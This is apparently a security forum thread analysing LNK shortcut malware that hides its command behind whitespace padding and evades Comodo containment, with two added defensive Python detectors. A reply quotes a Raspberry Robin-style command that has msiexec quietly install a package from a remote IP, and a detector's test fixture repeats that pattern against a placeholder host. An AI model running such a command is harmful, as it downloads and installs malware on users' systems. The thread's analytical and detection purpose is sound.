I have some sample LNK files, but CIS doesn’t automatically contain them, and HIPS isn’t effective either. In the Windows properties target, it appears to be just a .cmd command, but there are actually numerous spaces added to exceed the display limit, making it look deceptive.
In the hex viewer, you can see the correct instructions. The spaces look like this:
I’m using the proactive configuration in CIS. After executing the sample, it successfully connected to the C&C server without any alerts—there were no containment, HIPS, or firewall alerts.
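Added example (not part of the original post): a small Python script that parses the StringData section of a Shell Link (LNK) file and flags any string containing a long run of whitespace, the padding trick described above where the real command is pushed past what the Properties dialog displays. The layout constants follow the published MS-SHLLINK format; the sample LNK is constructed inline from a harmless argument string and is not any of the files discussed in the thread. The padding threshold (`max_run`) is an assumed tuning value.

```python
import struct

# Shell Link header layout (MS-SHLLINK): fixed 0x4C-byte header, magic size field and CLSID.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits needed to walk from the header to the StringData section.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def _read_string_data(buf, off, unicode):
    """Read one StringData entry: a 2-byte character count followed by the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        return buf[off:off + count * 2].decode("utf-16-le"), off + count * 2
    return buf[off:off + count].decode("latin-1"), off + count


def parse_lnk_strings(data):
    """Return the StringData fields (name, arguments, ...) present in an LNK byte string."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip LinkTargetIDList (2-byte size prefix)
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (4-byte size includes itself)
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:              # StringData entries appear in this fixed order
        if flags & bit:
            fields[name], off = _read_string_data(data, off, unicode)
    return fields


def padding_findings(fields, max_run=20):
    """Flag fields whose longest run of spaces/tabs reaches max_run (assumed threshold).

    Returns a list of (field_name, longest_run, stripped_value)."""
    findings = []
    for name, value in fields.items():
        run = longest = 0
        for ch in value:
            run = run + 1 if ch in " \t" else 0
            longest = max(longest, run)
        if longest >= max_run:
            findings.append((name, longest, value.strip()))
    return findings


def build_sample_lnk(arguments):
    """Construct a minimal LNK (no IDList, no LinkInfo) carrying only a Unicode arguments string."""
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
              + struct.pack("<I", HAS_ARGUMENTS | IS_UNICODE)).ljust(LNK_HEADER_SIZE, b"\x00")
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")


# Constructed sample: 300 spaces of padding ahead of a harmless command, as seen in the thread's hex view.
SAMPLE_ARGS = " " * 300 + "/c start notepad.exe"

if __name__ == "__main__":
    strings = parse_lnk_strings(build_sample_lnk(SAMPLE_ARGS))
    for field, run, value in padding_findings(strings):
        print(f"suspicious padding in {field}: {run} whitespace chars before {value!r}")
```

Run it against real files by reading the LNK bytes and passing them to `parse_lnk_strings`; a hit in `arguments` with a run of hundreds of spaces is the tell, since a legitimate shortcut has no reason to pad its command line past the dialog's display width.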
It is not enabled by default; you must manually turn it on. There is a second switch that needs to be toggled on, which is in the next column, as shown in the New_Style_xd screenshot.
Edit: Can you paste the full LNK command in your post? I think I might know the problem, thanks.
Well, you should also check the Active Process task and set it to show contained only, as it might actually be in containment. Also check the file list changes log to see what was added as trusted, because it might be incorrectly rated as trusted. Finally, you can try adding *\winrm.cmd to the script analysis section and enabling embedded code detection for all of the default listed applications.
Otherwise it is most likely a bug with embedded code detection logic, I know I reported it not working for msiexec.exe.
Just looking at things quickly, this guy seems to be a variant of Raspberry Robin in that it uses the command “msiexec /q /i hxxp://154.201.83.175:3989/@ /qn” to connect to a server. There are a number of these that differ in the embedded code, but I guess this particular file is:
0265e8680fd984e4d89b839a06b18498b5d81916fc672006b0a2c401faa162ad. This isn’t malicious in itself (no more than dashost.exe would be) but instead would be if it successfully connected out to a server to download a malicious package (which it does not do).
A variant for which the PowerShell command does work is (for the connection request only): 68d22f5b74f63fa13c4723b43545ceef4f588e96d5c3009c08cbe13aea2196ad
The above wants to connect out to download a package which would drop in C:\Tiles: these are the APerfectDay files, the executable of which is signed (although one certificate is outdated) by Tencent and is found to be benign; however, also in the package is a DLL which is not:
The above example is this (an MSI file that will drop the package and create a startup entry):
As Comodo will not allow the MSI to run successfully, one must execute the MSI in a VM with Containment off (not really suggesting this, by the way). Note that the installer is in Chinese and there is a few-minute timeout.
Note that although all of these desire to be stealers, none achieves such a lofty goal.
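Added example (not the poster's code): a defender-side check for the behaviour described in the analysis above, msiexec being asked to install a package straight from a remote URL with quiet switches. The script scans process-creation records in a constructed `pid,image,command_line` shape (an assumed format, not any particular product's telemetry) and raises an alert only when the `/i` package argument is a URL, so ordinary local quiet installs are left alone. The sample lines and the `example.invalid` host are constructed.

```python
import re

# Constructed process-creation records: "pid,image,command_line" (assumed format, not real telemetry).
SAMPLE_EVENTS = [
    "1001,C:\\Windows\\System32\\msiexec.exe,msiexec /q /i http://example.invalid:3989/@ /qn",
    "1002,C:\\Windows\\System32\\msiexec.exe,msiexec /i C:\\Installers\\app.msi /qn",
    "1003,C:\\Windows\\System32\\msiexec.exe,msiexec /x {00000000-0000-0000-0000-000000000000} /quiet",
    "1004,C:\\Windows\\System32\\notepad.exe,notepad.exe C:\\notes.txt",
]

# The package operand of /i (or its long form /package); msiexec accepts a URL here.
INSTALL_RE = re.compile(r"(?i)(?:^|\s)/(?:i|package)\s+(\S+)")
# Plain and defanged (hxxp) schemes so the check also works on shared IoC text.
URL_RE = re.compile(r"(?i)^(?:https?|hxxps?)://\S+")
# Quiet/unattended UI switches: /q, /qn, /qb, /quiet, /passive.
QUIET_RE = re.compile(r"(?i)(?:^|\s)/(?:q|qn|qb|quiet|passive)\b")


def analyse_msiexec(cmdline):
    """Describe one msiexec command line: which package it installs, whether it is remote, whether it is quiet."""
    m = INSTALL_RE.search(cmdline)
    package = m.group(1) if m else None
    remote = bool(package and URL_RE.match(package))
    return {
        "package": package,
        "remote_package": remote,
        "quiet": bool(QUIET_RE.search(cmdline)),
        # A remote package source is the alert condition; quiet flags are recorded as context.
        "alert": remote,
    }


def scan_events(lines):
    """Return (pid, package, quiet) for every msiexec launch that installs from a URL."""
    alerts = []
    for line in lines:
        pid, image, cmdline = line.split(",", 2)
        if not image.lower().endswith("\\msiexec.exe"):
            continue
        info = analyse_msiexec(cmdline)
        if info["alert"]:
            alerts.append((int(pid), info["package"], info["quiet"]))
    return alerts


if __name__ == "__main__":
    for pid, package, quiet in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: msiexec installing remote package {package} (quiet={quiet})")
```

The alert fires on the first record only: the second is a quiet install of a local file and the third is an uninstall, neither of which matches the remote-source pattern the variants in this thread rely on.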